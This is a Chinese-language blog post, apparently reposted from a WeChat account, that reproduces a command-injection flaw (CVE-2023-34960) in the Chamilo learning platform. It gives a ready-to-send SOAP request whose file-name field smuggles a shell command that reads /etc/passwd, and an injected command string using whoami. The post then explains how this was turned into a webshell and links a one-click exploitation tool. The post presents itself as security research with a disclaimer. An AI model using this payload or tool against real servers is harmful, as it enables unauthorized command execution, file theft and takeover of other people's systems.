​Chamilo命令执行漏洞(CVE-2023-34960)复现

admin
admin
admin
138883
文章
114
评论
2023年7月10日00:01:36评论28 views字数 2218阅读7分23秒阅读模式

产品介绍

Chamilo是一个开源的在线学习和内容管理系统,专注于易用性和可访问性。

漏洞介绍

Chamilo是一款可供用户免费下载的学习管理软件,其目的是提高来自弱势背景的用户对在线课程的可及性。Chamilo由一个名为Chamilo协会的非营利组织运行和管理。Chamilo存在命令执行漏洞,恶意攻击者可以通过构造的xml文件任意命令,进而控制服务器

漏洞poc

php

POST /main/webservices/additional_webservices.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 826
Content-Type: application/x-www-form-urlencoded

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{http://ip:port}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>

漏洞分析

根据上面exp我们分析一下这个漏洞形成的原因。下面代码 初始化了一个类SoapServer 并且输入了。构造函数传入了uri 和文件的位置。添加一个函数wsConvertPpt 并且使用handle函数进行处理。

​Chamilo命令执行漏洞(CVE-2023-34960)复现

漏洞代码

我们看到有exec函数 。这里可能是漏洞触发点我们用网站调试一下

​Chamilo命令执行漏洞(CVE-2023-34960)复现

漏洞函数

我们使用phpinfo()函数发现没有反应有人就说是是不是不是这个函数。我也想但是如果我把这个函数名称改了以后会报错

​Chamilo命令执行漏洞(CVE-2023-34960)复现

测试函数

修改函数名称报错。因此确定这个就是漏洞函数点。那为什么没有东西输出呢。可能是进行了调用了php内置函数清除输出了。那么我们怎么进行测试呢。我们看到有这一句代码 return serialize($data); 那么我们测试一下使用return 来返回数据代替echo 等输出命令

​Chamilo命令执行漏洞(CVE-2023-34960)复现

报错

明白如何接收数据了我们就可以构造exp了

​Chamilo命令执行漏洞(CVE-2023-34960)复现

接收数据

构造exp关键点

sh

cd /home/yachimec/public_html/learn/main/inc/lib/ppt2png && java  -Dfile.encoding=UTF-8 -cp .:jodconverter-2.2.2.jar:jodconverter-cli-2.2.2.jar DokeosConverter -p 2002 -w 720 -h 540 -d oogie "/home/yachimec/public_html/learn/archive/wsConvert/`{}`/`{}`.pptx'|" |whoami||a #"  "/home/yachimec/public_html/learn/archive/wsConvert/`{}`-n/`{}`.html" 只要这句可以执行那么exp就构
造完毕了

​Chamilo命令执行漏洞(CVE-2023-34960)复现

构造exp

造exp拿下webshell

我们自己构造exp 使用echo和管道符和其他linux命令执行拿下websell。改功能已经集成到工具里面了

​Chamilo命令执行漏洞(CVE-2023-34960)复现

拿下webshell

工具一键getshell执行结果。自动化getshell。另外我们看到最后是删除临时目录啥的这个可以使用条件竞争一直写文件。估计可以写shell直接。但是不如rce到位。

地址:

https://github.com/peiqiF4ck/WebFrameworkTools-5.1-main

​Chamilo命令执行漏洞(CVE-2023-34960)复现

原文始发于微信公众号(网络安全者):​Chamilo命令执行漏洞(CVE-2023-34960)复现(文末送书福利)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月10日00:01:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ​Chamilo命令执行漏洞(CVE-2023-34960)复现https://cn-sec.com/archives/1912780.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息